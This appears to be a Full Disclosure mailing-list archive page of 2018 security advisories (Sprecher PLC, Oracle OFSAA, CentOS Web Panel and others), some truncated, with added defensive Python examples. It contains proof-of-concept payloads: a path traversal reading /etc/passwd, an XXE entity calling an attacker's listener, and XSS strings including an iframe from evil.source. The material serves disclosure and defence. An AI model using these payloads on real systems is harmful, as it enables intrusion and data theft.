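        return self._files.get(name)         # any requester can read any image


class HardenedImageStore:
    """Random references plus an authorization decision on every read."""

    def __init__(self, hidden_profiles: Dict[str, bool]) -> None:
        self._hidden = hidden_profiles       # user -> profile set to "hidden"?
        self._files: Dict[str, Tuple[str, bytes]] = {}

    def upload(self, owner: str, data: bytes) -> str:
        ref = secrets.token_urlsafe(16)      # 128 random bits: cannot be iterated
        self._files[ref] = (owner, data)
        return ref

    def fetch(self, requester: str, ref: str) -> Optional[bytes]:
        entry = self._files.get(ref)
        if entry is None:
            return None
        owner, data = entry
        if requester == owner:
            return data                      # owners always see their own image
        if self._hidden.get(owner, True):    # unknown owner: treat as hidden
            return None                      # hidden profile: deny everyone else
        return data                          # visible profile: allow


def enumerate_sequential(store: VulnerableImageStore, requester: str,
                         start: int, count: int) -> int:
    """Regression check: how many images one user retrieves by counting upwards."""
    found = 0
    for n in range(start, start + count):
        if store.fetch(requester, f"{n}.png") is not None:
            found += 1
    return found


def demo() -> dict:
    """Exercise both stores with constructed users; returns outcomes for checking."""
    hidden = {"alice": True, "bob": False}   # alice's profile is hidden, bob's is not
    vuln = VulnerableImageStore()
    for user in ("alice", "bob", "alice"):
        vuln.upload(user, b"\x89PNG constructed sample")
    hard = HardenedImageStore(hidden)
    alice_ref = hard.upload("alice", b"\x89PNG constructed alice")
    bob_ref = hard.upload("bob", b"\x89PNG constructed bob")
    return {
        "vulnerable_images_enumerated": enumerate_sequential(vuln, "other_user", 200, 10),
        "hardened_guess_fails": hard.fetch("other_user", "200.png") is None,
        "hardened_hidden_denied": hard.fetch("other_user", alice_ref) is None,
        "hardened_visible_allowed": hard.fetch("other_user", bob_ref) is not None,
        "hardened_owner_allowed": hard.fetch("alice", alice_ref) is not None,
    }
```

The random reference alone is not the fix: an unguessable name still leaks the
moment it is shared or logged, which is why `HardenedImageStore.fetch` makes the
ownership and visibility decision on every request rather than relying on
secrecy of the reference.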


7) Missing Authentication in Remote Control
The mobile apps allow their users to use a feature called quick control.
This feature sends a link with a unique ID to an email address or to a
telephone via SMS, giving direct control of the sex toy over the internet.
This wouldn't be a problem in gen

[FD] SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433

2018-01-30 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 >
===
  title: Multiple Vulnerabilities
product: Sprecher Automation SPRECON-E-C, PU-2433
 vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for details)
  fixed version: 8.49 (most vulnerabilities, see "Solution" for details)
 CVE number: -
 impact: Medium
   homepage: https://www.sprecher-automation.com
  found: 2017-08-15
 by: T. Weber, C.A. (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Sprecher Automation GmbH offers switchgears and automation solutions
for energy, industry and infrastructure processes. Our customers are
power utilities, industries, transportation companies, municipal
utilities and public institutions.

Company-own developments and cooperations with technology
partners lead to a unique product portfolio consisting of traditional
electrical technologies as well as high-tech electronics."

Source: https://www.sprecher-automation.com/en/


Business recommendation:
------------------------
SEC Consult recommends immediately patching the systems and following the
hardening guide provided by the vendor (SEC Consult did not have access to the
hardening guide in order to review it).

A thorough security review should be performed by security professionals as
further security issues might exist within the product.


Vulnerability overview/description:
---
1) Authenticated Path Traversal Vulnerability
The web interface of the Sprecher PLC suffers from a path traversal
vulnerability. A user who is authenticated on the web interface, which is
intended as a read-only interface, can download files with the permissions of
the web server (www-data).

Files like "/etc/shadow" are not readable for the web server.


2) Client-Side Password Hashing
The password hashes stored on the system can be used directly to authenticate
on the web interface (pass-the-hash), since the password is hashed in the
user's browser during login.


3) Missing Authentication
The PLC exposes a Telnet management service on TCP port 2048.
This interface can be used to control the PLC and does not require any
authentication.


4) Permanent Denial of Service via Portscan
An aggressive TCP SYN scan of a large number of ports triggers a denial of
service of the PLC service. This results in a persistent DoS of the standby
PLC in an active-standby pair. Manual operator intervention is required to
restore service availability.


5) Outdated Linux Kernel
An ancient Linux kernel version with a high number of known security weaknesses
is used for the PLC base operating system.


Proof of concept:
-----------------
1) Authenticated Path Traversal Vulnerability
Reading "passwd" is possible by triggering the following request:
---
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host: 
Cookie: sid=
Connection: close
Upgrade-Insecure-Requests: 1
---

The file is directly fetched from the system:
---
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[...]
---
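
The request above works because the file parameter is joined to a base
directory and served without checking where the joined path ends up. The
following added example (not Sprecher's or SEC Consult's code) shows the check
a download handler should make: resolve the path first, then test containment
on path components rather than on a string prefix. The directory layout and
sample files are constructed in a temporary directory; the `4_1`-style
parameter is modelled by the `requested` argument.

```python
"""Containing a file-download parameter inside its intended directory."""
import tempfile
from pathlib import Path
from typing import Optional


def resolve_download(base_dir: str, requested: str) -> Optional[Path]:
    """Return the file to serve, or None when `requested` escapes `base_dir`.

    resolve() collapses '..' and follows symlinks, so the comparison is made on
    the real location rather than on the string the client sent. Containment is
    tested on path components: a string-prefix test would accept
    '<base>-private/secret' for '<base>'.
    """
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()   # an absolute `requested` replaces base entirely
    if candidate != base and base not in candidate.parents:
        return None                            # outside the directory: refuse
    if not candidate.is_file():
        return None                            # directories, devices, missing files: refuse
    return candidate


def naive_prefix_check(base_dir: str, requested: str) -> bool:
    """The common mistake: a string prefix test on the resolved path."""
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    return str(candidate).startswith(str(base))


def demo() -> dict:
    """Exercise both checks in a throwaway tree; returns a boolean per case."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = Path(tmp, "webserver", "docs")              # constructed download root
        private = Path(tmp, "webserver", "docs-private")   # constructed sibling directory
        docs.mkdir(parents=True)
        private.mkdir()
        (docs / "manual.pdf").write_bytes(b"%PDF-1.4 constructed sample\n")
        (private / "secret.txt").write_text("constructed secret\n")
        traversal = "../../../../../../../etc/passwd"      # the value from the request above
        return {
            "legit_served": resolve_download(str(docs), "manual.pdf") is not None,
            "traversal_blocked": resolve_download(str(docs), traversal) is None,
            "absolute_blocked": resolve_download(str(docs), "/etc/passwd") is None,
            "missing_blocked": resolve_download(str(docs), "no-such-file.pdf") is None,
            "sibling_blocked": resolve_download(str(docs), "../docs-private/secret.txt") is None,
            # The prefix test wrongly accepts the sibling directory.
            "naive_accepts_sibling": naive_prefix_check(str(docs), "../docs-private/secret.txt"),
        }
```

On the device side the same containment rule applies to the CGI handler, and
the file list it serves should be an allowlist of download names rather than an
arbitrary relative path.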


2) Client-Side Password Hashing
The passwords are hashed in JavaScript before they are transmitted to the
device. Therefore the hash is as good as the password.
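
The following added example (not Sprecher's, Vibratissimo's or SEC Consult's
code) covers two points on this page: Sprecher issue 2, where a digest computed
in the browser is a password equivalent, so a stored hash can simply be
replayed, and Vibratissimo issue 3, where user passwords must never be stored
in cleartext. The weak scheme is modelled with an unsalted SHA-256 digest; the
hardened scheme hashes on the server with PBKDF2 and a per-user salt. The
sample password and the record format are constructed.

```python
"""Server-side salted hashing versus a browser-computed hash."""
import hashlib
import hmac
import os

# --- Weak scheme: the browser hashes, the server only compares --------------
# The database holds H(password) and the login page sends H(password). Whatever
# is stored is exactly what a client must transmit, so a dumped table logs in
# without anyone knowing a single password.


def client_side_hash(password: str) -> str:
    """Unsalted digest as a login page's JavaScript would compute it (modelled)."""
    return hashlib.sha256(password.encode()).hexdigest()


def weak_login(stored_hash: str, presented_hash: str) -> bool:
    """Server side of the weak scheme: compare the transmitted digest with the stored one."""
    return hmac.compare_digest(stored_hash, presented_hash)


# --- Hardened scheme: the server hashes with a per-user salt and work factor --
# 600,000 iterations is OWASP's 2023 recommendation for PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 600_000


def store_password(password: str) -> str:
    """Return a storable record 'pbkdf2$<iterations>$<salt hex>$<hash hex>' (constructed format)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(record: str, password: str) -> bool:
    """Recompute from the cleartext the user sent over TLS and compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = record.split("$")
        salt = bytes.fromhex(salt_hex)
        rounds = int(iterations)
    except ValueError:
        return False                         # malformed record: never authenticate
    if scheme != "pbkdf2" or rounds < 1:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return hmac.compare_digest(digest.hex(), digest_hex)


def demo() -> dict:
    """Run both schemes against a constructed user and report the outcomes."""
    password = "correct horse battery staple"  # constructed sample
    leaked = client_side_hash(password)        # what a dumped table reveals
    record = store_password(password)
    return {
        # Weak scheme: replaying the stored digest is a successful login.
        "weak_replay_succeeds": weak_login(leaked, leaked),
        # Hardened scheme: the stored record does not work as a credential...
        "strong_replay_succeeds": verify_password(record, record),
        # ...the real password still verifies...
        "strong_password_ok": verify_password(record, password),
        # ...and a wrong one does not.
        "strong_wrong_rejected": verify_password(record, "wrong"),
        # Per-user salt: the same password never yields the same record twice.
        "records_differ": store_password(password) != record,
    }
```

Hashing in the browser only helps when it is combined with a second,
server-side hash of the received value; on its own it just moves the secret
the server compares against into the database.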

The following request shows a login process:
---
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http:///We

[FD] Banknotes Misproduction security & biometric weakness

2018-01-30 Thread Vulnerability Lab
Document Title:
===============
Banknotes Misproduction security & biometric weakness


References:
===========
https://www.vulnerability-lab.com/get_content.php?id=2105

Download:
https://www.vulnerability-lab.com/resources/documents/7692342363856723534.rar

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/01/28/banknotes-misproduction-security-biometric-weakness

Video: https://www.vulnerability-lab.com/get_content.php?id=2106

Other Reference(s):
https://threatpost.com/lenovo-fixes-hardcoded-password-flaw-impacting-thinkpad-fingerprint-scanners/129680/


Release Date:
=============
2018-01-29


Vulnerability Laboratory ID (VL-ID):
====================================
2105


Common Vulnerability Scoring System:
====================================
6


Vulnerability Class:
====================
Insecure Configuration Management


Current Estimated Price:
========================
10.000€ - 25.000€


Vulnerability Disclosure Timeline:
==================================
2018-01-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Bulletins


Severity Level:
===============
High


Technical Details & Description:
================================
In the last months we reviewed the new 20€ & 50€ banknotes of the European
Central Bank. One of our core team researchers identified that different
components are used for the security sign of the holograms. The security signs
are built by the European Central Bank with several high-profile elements to
ensure that the banknotes have a serious level of protection against fraud or
fake money. After spending some time identifying an impact, we were finally
able to identify the following security problem ...


Credits & Authors:
==
Benjamin Kunz Mejri - Vulnerability-Lab Core Team - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Contact: [resea...@vulnerability-lab.com] 
Cooperation: Forum für Cyber Sicherheit e.V. - Deutschland


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not
approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for
criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails, phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:    www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file,
resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark of vulnerability-lab team & the specific authors or managers. To
record, list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



[FD] SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications

2018-01-22 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
===
  title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
 vulnerable version: 7.3.5.x, 8.0.x
  fixed version: Oracle CPU January 2018
 CVE number: CVE-2018-2660, CVE-2018-2661
 impact: High
   homepage: http://www.oracle.com/us/products/applications/
 financial-services/analytical-applications/index.html
  found: 2017-06-15
 by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh
 (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Oracle is the unchallenged leader in Financial Services, with an
integrated, best-in-class, end-to-end solution of intelligent software
and powerful hardware designed to meet every financial service need."

Source: http://www.oracle.com/us/products/applications/
financial-services/analytical-applications/index.html


Business recommendation:
------------------------
By exploiting the XXE vulnerability, an attacker can get read access to the
file system of the system on which the OFSAA web application runs and thus
obtain sensitive information from it. It is also possible to bypass input
validation checks in order to inject JavaScript code.

SEC Consult recommends installing the patched version immediately.
Furthermore, a thorough security review should be performed by security
professionals to identify potential further security issues.


Vulnerability overview/description:
---
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a
specially crafted XML file and exploit the XXE vulnerability within the
application.

2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious
client-side script, which is executed in the browser of any user who visits
the manipulated URL.


Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload"
function, a connection request from the server to the attacker's system will be
made.


 
   http://[IP:port]/"; >]>&xxe;

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
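
An XXE payload of the kind shown above needs a DOCTYPE carrying an entity
declaration, and an upload function like "Business Model Upload" has no
legitimate need for a DTD at all. The following added example (not Oracle's or
SEC Consult's code) is a pre-parse gate that refuses any DTD or entity
declaration before the document reaches the application's XML parser. It uses
only the standard library's expat binding; the sample documents are constructed,
and the external entity in the rejected sample points at a reserved `.invalid`
host that is never contacted because the gate fires first.

```python
"""Rejecting DTDs in uploaded XML before the application parser sees them."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when an upload contains constructs that make XXE possible."""


def reject_dtd(document: bytes) -> None:
    """Throwaway expat pass that raises on any DOCTYPE or entity declaration.

    No element tree is built; the pass exists only to fire on the constructs
    an external-entity payload depends on.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE '{name}' not allowed in uploaded XML")

    def on_entity(*_args):
        raise UnsafeXMLError("entity declarations not allowed in uploaded XML")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # Belt and braces: even if a handler were missed, never resolve anything external.
    parser.ExternalEntityRefHandler = lambda *_args: False
    try:
        parser.Parse(document, True)
    except expat.ExpatError as exc:
        raise UnsafeXMLError(f"malformed XML: {exc}") from exc


def parse_upload(document: bytes) -> ET.Element:
    """Gate first, then hand the document to the normal application parser."""
    reject_dtd(document)
    return ET.fromstring(document)


def classify(document: bytes) -> str:
    """Return 'accepted' or the gate's reason; convenient for logging and tests."""
    try:
        parse_upload(document)
        return "accepted"
    except UnsafeXMLError as exc:
        return f"rejected: {exc}"


# Constructed sample of a harmless upload.
BENIGN_UPLOAD = b"""<?xml version="1.0"?>
<businessModel><entity name="Customer"><attr name="id"/></entity></businessModel>"""

# Constructed sample of the class of input the advisory describes. The SYSTEM
# URL uses the reserved .invalid TLD and is never fetched: the gate raises on
# the DOCTYPE before any entity could be resolved.
DTD_UPLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE businessModel [ <!ENTITY ext SYSTEM "http://listener.invalid/"> ]>
<businessModel>&ext;</businessModel>"""
```

Where the application parser is a library with its own switches (Java's
`XMLInputFactory`, libxml2, .NET's `XmlReaderSettings`), disabling DTD
processing there is the primary control; the gate above is the portable check
that does not depend on remembering every parser's flag.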


2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to reflected
cross-site scripting attacks; many more vulnerable parameters exist.

The following payload shows a simple alert message box:
URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD  : GET
PAYLOAD :
winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?
url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~
METHOD  : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm
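
The first reflection point above lands the `winTitle` parameter inside the
page's `<title>` element, and the payload works by closing that element and
opening an `<img>` with an event handler. The following added example (not
Oracle's or SEC Consult's code) renders a constructed page template once with
the parameter reflected verbatim and once with it HTML-encoded, then uses the
standard library's HTML parser to list the elements a browser would actually
instantiate. The payload is the one quoted in the advisory, URL-decoded; the
template is constructed.

```python
"""Context-aware output encoding for a reflected parameter, with a parser-based check."""
import html
from html.parser import HTMLParser
from typing import List
from urllib.parse import unquote

# The advisory's winTitle payload, decoded as the server would see it.
WIN_TITLE_PAYLOAD = unquote(
    "a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E"
)

# Constructed stand-in for the popup page; the real JSP is not reproduced here.
TEMPLATE = "<html><head><title>{title}</title></head><body><p>alert</p></body></html>"


def render_vulnerable(win_title: str) -> str:
    """Reflects the parameter verbatim: the </title> in the payload ends the element."""
    return TEMPLATE.format(title=win_title)


def render_hardened(win_title: str) -> str:
    """HTML-encodes the parameter for the text context it is placed in."""
    return TEMPLATE.format(title=html.escape(win_title, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag, i.e. the elements a browser would create."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_in(page: str) -> List[str]:
    """Start tags of `page` in document order."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags


def injected_elements(page: str, expected: List[str]) -> List[str]:
    """Elements present in the rendered page that the template never emits."""
    return [t for t in elements_in(page) if t not in expected]


# Baseline: the elements the template produces for a harmless title.
EXPECTED_TAGS = elements_in(TEMPLATE.format(title="safe title"))
```

The same parser-based comparison makes a cheap regression test for every
reflection point an application fixes: render with the recorded payload and
assert that no element outside the template's own set appears.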


Vulnerable / tested versions:
-----------------------------
The following version was tested, which was the most recent one when the
vulnerabilities were discovered:

* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU
January 2018.


Vendor contact timeline:
------------------------
2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that the Critical Patch Update that includes fixes
            for the reported issues will be released on 2018-01-16.
            CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory


Solution:
---------
Apply patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html


Workaround:
---
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~

[FD] CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities

2018-01-22 Thread Vulnerability Lab
AD!]
   Response Header:
  Date[Mon, 25 Apr 2016 12:32:33 GMT]
  Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
  X-Powered-By[PHP/5.4.27]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
  Pragma[no-cache]
  Keep-Alive[timeout=5, max=100]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html]


Reference(s):
http://cwp.localhost:2030/
http://cwp.localhost:2030/index.php
http://cwp.localhost:2030/index.php?module=list_domains


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the centos 
web panel application is estimated as high. (CVSS 7.5)


Credits & Authors:
==
Vulnerability-Lab [ad...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some states do not allow
the exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply. We do not approve or
encourage anybody to break any licenses, policies, deface websites, hack into
databases or trade with stolen data.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com
Section:    magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark of vulnerability-lab team & the specific authors or managers. To
record, list, modify, use or edit our material contact (admin@ or
resea...@vulnerability-lab.com) to get a ask permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



[FD] Acadmic Microsoft - API Query Filter Cross Site Scripting Vulnerability

2018-01-21 Thread Vulnerability Lab
%20http%3A%2F%2Fevil.source%3E%3C%2Fiframe%3E%40&correlationId=undefined
 HTTP/1.1
Host: academic.microsoft.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: https://academic.microsoft.com/
Cookie: 
utag_main=v_id:015b543cdafd00b14436aadab8900104400390090086e$_sn:1$_ss:0$_st:1491768750447$ses_id:1491766926079%3B
exp-session$_pn:2%3Bexp-session; s_norv=1491766950419-New; 
s_vnum=1493611200871%26vn%3D1; s_invisit=true; s_dslv=1491766950423; 
s_dslv_s=First%20Visit; s_ppn=mpdacad%3Aen-us%3Aregister; 
s_ppvl=mpdacad%253Aen-us%253Alogin%2C100%2C89%2C643%2C1355%2C621%2C1366%2C768%2C1%2CP;
 
s_ppv=mpdacad%253Aen-us%253Aregister%2C100%2C92%2C675%2C1355%2C621%2C1366%2C768%2C1%2CP;
 s_fid=2DCC642E0324D787-3D30FA055450DC93; 
s_cc=true; 
s_sq=msstompdacad%3D%2526c.%2526a.%2526activitymap.%2526page%253Dmpdacad%25253Aen-
us%25253Aregister%2526link%253DSign%252520up%252520with%252520Microsoft%252520account%2526region%253Dmain%2526pageIDType%253D1%2526.
activitymap%2526.a%2526.c%2526pid%253Dmpdacad%25253Aen-us%25253Aregister%2526pidt%253D1%2526oid%253DSign%252520up%252520with%252520
Microsoft%252520account%2526oidt%253D3%2526ot%253DSUBMIT; 
AMCV_EA76ADE95776D2EC7F000101%40AdobeOrg=
-179204249%7CMCMID%7C28933220378893493633963593270039587370; 
MSFPC=ID=d9c52c60bfa3454780dd8fed1ee6d500&CS=1&LV=201704&V=1; 
msacademic=da629bfe-3e6a-4e63-8c85-d684ae83d1d6
Connection: close
-
Response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 09 Apr 2017 12:55:23 GMT
Connection: close
Content-Length: 230



Reference(s):
https://academic.microsoft.com/
https://academic.microsoft.com/api/
https://academic.microsoft.com/api/search/
https://academic.microsoft.com/api/search/GetFilters


Solution - Fix & Patch:
=======================
2018-**-**: Security Acknowledgements (Microsoft Security Response Center Team) - Unresponsive


Security Risk:
==
The security risk of the non-persistent cross site scripting web vulnerability 
is estimated as medium. (CVSS 3.2)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Lawrence Amer 
(http://lawrenceamer.me) 
Profile: https://www.vulnerability-lab.com/show.php?user=Lawrence Amer



Copyright © 2018 | Vulnerability La

[FD] CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities

2018-01-19 Thread Vulnerability Lab
tacks.
Escape the output content of the error exception for invalid inputs to prevent 
the execution point of the client-side vulnerability.


Security Risk:
==
The security risk of the client-side cross site scripting web vulnerability in 
the centos web panel is estimated as medium (CVSS 3.3).


Credits & Authors:
==
Benjamin Kunz Mejri (Vulnerability Laboratory) - 
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.



Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



[FD] Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities

2018-01-19 Thread Vulnerability Lab
ulnerability can be patched by a secure parse of the customer (kunden) 
and orders (bestellungen) context listings.
Parse or escape the context and disallow special chars during the registration 
or add to prevent further script code injection attacks.

The vulnerability can be resolved by an update to version 5.3.4 that is 
delivered by the manufacturer. The issue risk is marked as moderate.



Security Risk:
==
The security risk of the stored cross site scripting vulnerabilities in the 
shopware cms are estimated as medium. (CVSS 4.4)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
[http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]



Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities

2018-01-19 Thread Vulnerability Lab
; WOW64; rv:45.0) Gecko/20100101 
Firefox/45.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[http://localhost:2030/index.php?module=mail_add-new]
  
Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; 
PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
  Connection[keep-alive]
   POST-Daten:
  ifpost[yes]
  email_address[%3E%22%3CPAYLOAD INJECTION POINT!+src]
  domain[test-domain.com]
  password[%3E%22%3CPAYLOAD INJECTION POINT!+src]
   Response Header:
  Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
  X-Powered-By[PHP/5.4.27]
